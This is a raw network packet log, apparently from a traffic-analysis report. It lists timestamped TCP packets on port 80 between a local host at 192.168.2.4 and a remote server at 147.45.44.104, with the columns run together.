                                                                                                                                                      Oct 11, 2024 23:07:03.757241964 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.757256985 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.757261038 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.757303953 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.757672071 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.757687092 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.757700920 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.757725000 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.757730961 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.757746935 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.757761002 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.757761955 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.757805109 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.846882105 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.846951008 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847004890 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847038984 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.847053051 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847086906 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847111940 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.847119093 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847151995 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847183943 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847191095 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.847218037 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847229958 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.847249031 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847280979 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847311974 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847328901 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.847343922 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847362041 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.847376108 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847424030 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.847429037 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847476959 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847508907 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847522974 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.847537041 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847573042 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847580910 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.847604990 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847635984 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847651958 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.847671032 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.847734928 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.936626911 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936665058 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936682940 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936707973 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936723948 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936722040 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.936738968 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936754942 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936760902 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.936769962 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936793089 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936805010 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936819077 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936824083 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.936835051 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936861038 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936862946 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.936877012 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936891079 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936893940 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.936906099 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936937094 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.936973095 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.936980009 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.936995029 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.937009096 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.937037945 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.937355995 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.937401056 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.937403917 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.937421083 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.937465906 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:03.937494993 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.937515020 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.937529087 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:03.937598944 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.026760101 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.026783943 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.026802063 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.026838064 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.026845932 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.026859999 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.026875019 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.026887894 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.026890993 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.026904106 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.026912928 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.026948929 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.026963949 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.026972055 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.026977062 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.026992083 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.027005911 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.027017117 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.027019024 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.027034044 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.027055025 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.028723955 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.028740883 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.028757095 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.028772116 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.028795004 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.028856993 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.029089928 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.029136896 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.029139042 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.029151917 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.029191971 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.029372931 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.029387951 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.029437065 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.116568089 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116595984 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116612911 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116621017 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116628885 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116636038 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116643906 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116652012 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116660118 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116667032 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116674900 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116684914 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116715908 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116728067 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116799116 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116816998 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116832018 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116853952 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.116868019 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116889000 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116903067 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116904020 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.116930962 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.116950989 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.116961956 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.116975069 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.117002010 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.117016077 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.117029905 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.117047071 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.117114067 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.117127895 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.117142916 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.117156029 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.117204905 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.206899881 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.206927061 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.206945896 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.206955910 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.206964016 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.206970930 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.206984997 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.206998110 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207011938 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207026958 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207041979 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207082033 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.207129955 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207144022 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207159042 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207160950 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.207173109 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207185984 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207186937 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.207211971 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.207268000 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.207268000 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207283020 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207297087 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207309961 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207323074 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207331896 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.207336903 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207353115 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207365036 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.207401037 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.207418919 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207432032 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207447052 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.207459927 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.207499981 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.297343969 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297451973 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297487020 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297519922 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297530890 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.297554016 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297595978 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297602892 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.297646999 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297648907 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.297682047 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297713041 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297736883 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.297745943 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297776937 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297813892 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.297827005 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297874928 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297880888 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.297928095 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297960997 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.297980070 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.297992945 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.298026085 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.298043966 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.298057079 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.298088074 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.298119068 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.298126936 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.298150063 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.298165083 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.298182011 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.298213959 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.298230886 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.298244953 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.298275948 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.298304081 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.298310041 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.298357964 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.388166904 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388262987 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388325930 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388377905 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388431072 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388464928 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388470888 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.388499022 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388506889 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.388530970 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388547897 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.388562918 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388578892 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.388593912 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388628006 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388643980 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.388659954 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388711929 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388714075 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.388746023 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388792992 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388793945 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.388829947 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388859034 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388880014 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.388910055 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388957977 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.388963938 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.388994932 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389039040 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.389050007 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389079094 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389108896 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389123917 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.389142036 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389170885 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389189005 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.389202118 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389233112 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389245987 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.389261007 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389291048 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389305115 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.389322042 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389353037 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389369011 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.389384985 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389420033 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.389431953 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.429400921 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.478338003 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478370905 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478385925 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478419065 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478452921 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478509903 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.478509903 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.478548050 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478586912 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478619099 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478640079 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.478718996 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478720903 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.478750944 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478782892 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478815079 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.478815079 CEST8049730147.45.44.104192.168.2.4
